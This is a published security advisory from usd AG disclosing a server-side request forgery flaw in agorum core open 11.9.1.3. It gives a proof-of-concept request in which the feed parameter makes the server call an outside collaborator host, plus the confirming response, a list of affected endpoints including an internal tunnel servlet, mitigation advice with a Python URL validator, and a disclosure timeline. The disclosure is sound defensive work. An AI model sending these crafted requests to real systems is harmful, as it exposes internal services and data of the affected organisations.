usd-2025-0025 | Agorum core open 11.9.1.3-1857 - Server-Side Request Forgery (SSRF)
Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Server-Side Request Forgery (SSRF) (CWE-918)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0025
Description
agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.
Proof of Concept
Several endpoints in the application are vulnerable to Server-Side Request Forgery (SSRF). This allows attackers to craft requests that cause the server to initiate connections to arbitrary internal or external resources, potentially exposing sensitive information or enabling further attacks.
The following request demonstrates the SSRF vulnerability. When submitted, the server makes a request to the specified URL:
GET /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp?reloadTime=600000);}&feed=http://etbjk99mmtvsce0wjfkmjof3zu5ntdh2.burp.usd.de/ssrf HTTP/1.1
Host: localhost
[...]
In the response, it is evident that the server has fetched content from the target resource, confirming the SSRF behavior:
HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1422
Date: Fri, 02 May 2025 07:48:55 GMT
Server: Apache-Coyote/1.1
[...]
<body onload="initReload()">
<div class="tableblock">
<table>
<!-- <html><body>xjiz55z1r9egabbtzruo7czjlgigz</body></html>-->
<th>null</th>
</table>
</div>
</body>
[...]
To further demonstrate the server's outbound request capabilities, a payload was sent to a Burp Collaborator URL. The interaction received confirms the SSRF vulnerability and shows that the server can establish external network connections:
The vulnerability is present in multiple locations. The following is a non-exhaustive list of affected endpoints:
- /roiwebui/desk4web_module/gadgets/rssreader/RSSReader.jsp
- /roiwebui/TunnelServlet?tunnelAddress=127.0.0.1&tunnelPort=1234
Fix
It is recommended to evaluate whether making server-side requests is necessary for the functionality of the application.
If this is the case, the security measures to implement depend on the type of server-side requests:
If the application only needs to make requests to a precisely defined set of systems, these systems can be placed on an allowlist.
If, on the other hand, the application must be able to make requests to arbitrary external resources on the Internet, an allowlist cannot be used, since the set of permitted systems cannot be defined in advance.
Instead, a denylist, a ruleset describing disallowed requests, should be defined that reflects the expected format of legitimate requests.
Users of agorum core open can upgrade to versions 11.9.2 and 11.10.1.
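As an added example (not agorum's own code), the two mitigation modes described above applied to the parameters named in this advisory: a host-level check that runs in allowlist or denylist mode, wrapped for the RSS feed URL and reusable for tunnelAddress. The DNS table, host names and addresses are constructed so the check runs offline.

```python
import ipaddress
from typing import Callable, Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed DNS table so the check runs offline; in production pass a real
# resolver (e.g. socket.getaddrinfo) and connect to the validated address.
CONSTRUCTED_DNS = {
    "feeds.example": ["11.22.33.44"],                # sample public address
    "intranet.example": ["10.0.0.5"],                # RFC 1918 host
    "rebind.example": ["11.22.33.44", "127.0.0.1"],  # mixed public/loopback answers
}

def constructed_resolver(host: str) -> List[str]:
    return CONSTRUCTED_DNS.get(host, [])

def is_public_address(ip: str) -> bool:  # routable on the public Internet only
    a = ipaddress.ip_address(ip)
    return a.is_global and not (a.is_private or a.is_loopback or a.is_link_local
                                or a.is_multicast or a.is_reserved or a.is_unspecified)

def check_target(host: str, resolve: Callable[[str], List[str]],
                 allowed_hosts: Optional[Iterable[str]] = None) -> Tuple[bool, str]:
    """Host policy shared by the feed= and tunnelAddress= parameters: with
    allowed_hosts only listed hosts pass (allowlist); without it any host passes
    unless some address it resolves to is non-public (denylist)."""
    host = host.strip().lower().rstrip(".")
    if allowed_hosts is not None:
        ok = host in {h.lower() for h in allowed_hosts}
        return ok, "host on allowlist" if ok else "host not on allowlist"
    try:
        ipaddress.ip_address(host)          # literal IP, nothing to resolve
        addrs = [host]
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for ip in addrs:                        # refuse if ANY answer is internal
        if not is_public_address(ip):
            return False, "resolves to non-public address %s" % ip
    return True, "all addresses public"

def check_feed_url(url: str, resolve: Callable[[str], List[str]],
                   allowed_hosts: Optional[Iterable[str]] = None) -> Tuple[bool, str]:
    """Validate a user-supplied URL such as RSSReader.jsp's feed= parameter."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme must be http or https"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    return check_target(parts.hostname, resolve, allowed_hosts)
```

In denylist mode the check has to be repeated for every redirect hop, and the connection should be made to the address that was validated, otherwise a name whose answer changes between check and connect bypasses it.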
Timeline
- 2025-05-05: First contact request via mail.
- 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
- 2025-05-07: The vendor has begun addressing and fixing the issue.
- 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
- 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
- 2025-06-27: This advisory is published.
Credits
This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.